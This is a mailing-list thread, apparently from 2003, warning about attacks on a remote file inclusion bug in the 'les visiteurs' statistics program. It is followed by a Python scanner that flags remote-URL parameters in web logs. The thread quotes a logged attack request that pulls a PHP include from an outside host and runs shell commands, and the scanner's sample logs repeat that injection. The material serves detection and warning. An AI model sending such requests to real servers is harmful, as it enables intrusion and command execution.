Message-ID: <3FCBD84F.3080605@euskalnet.net>
From: gazpa at euskalnet.net (gazpa)
Subject: file inclusion (les visiteurs)

Hi Lorenzo,
First there isn't *their server*. It's other stuff server 
(c2r.canalforbid.org).
Second, they use this server to serve an include file (hax.gif), a php 
include to *inject* in the buggy 'les visiteurs' (web statistics 
program) remotely and execute shell commands.
And I don't think they are kiddies, if they wrote 'hax.gif', like it seems.
Don't blame people who are only intending to advise people about a bug 
that is being exploited.

Lorenzo Hernandez Garcia-Hierro wrote:

>Hi Daniel ,
>They are kiddies... :(
>I was looking the files and there are only high-risk-rated exploits
>downloaded from packet storm , ptrace , etc .
>And they are running remote php shells in their server.... xD
>
>See you in the IRC tonight ?
>
>  
>
>>"Evert Daman" <evert@...ipix.org> wrote:
>>
>>    
>>
>>>last night snort detected this request:
>>>
>>>GET /counter/include/new-visitor.inc.php?lvc_include_dir=http://c2r.canalforbid.
>>>org/hax.gif?&cmd=cd%20/tmp;uname%20-a;id;cat%20/proc/version;ls
>>>
>>>because I patched 'les visiteurs' as described by 'matthieu peschaud'
>>>on bugtraq on the 26 of October nothing happened, but it looks like someone is trying to exploit this bug.
>>>just want to mention it to this wonderful list :)
>>>
>>>      
>>>
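
The request quoted above can also be found after the fact in web server access logs. The following is an added example, not code from any poster in this thread: it flags any query parameter whose decoded value is a remote URL, which generalizes beyond `lvc_include_dir`. The log format (Apache combined style), the host `remote.example`, the client addresses and the function names are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that starts with a remote scheme is the signal we look for.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def remote_include_params(target):
    """Return [(name, value)] for query parameters whose decoded value is a remote URL."""
    query = target.partition('?')[2]
    hits = []
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        value = unquote(value)  # catches http%3A%2F%2F... as well as the plain form
        if REMOTE_RE.match(value):
            hits.append((unquote(name), value))
    return hits

def scan(lines):
    """Return [(line_no, client, param, value)] for every suspicious request."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client = line.split()[0]
        for name, value in remote_include_params(match.group(1)):
            findings.append((line_no, client, name, value))
    return findings

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Dec/2003:02:11:09 +0100] "GET /counter/include/'
    'new-visitor.inc.php?lvc_include_dir=http://remote.example/hax.gif?&cmd=id'
    ' HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Dec/2003:02:12:40 +0100] '
    '"GET /counter/index.php?page=stats HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Dec/2003:02:15:02 +0100] "GET /counter/include/'
    'new-visitor.inc.php?lvc_include_dir=http%3A%2F%2Fremote.example%2Fx.txt'
    ' HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for line_no, client, name, value in scan(SAMPLE_LOG):
        print(f"line {line_no}: {client} set {name} to remote URL {value}")
```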


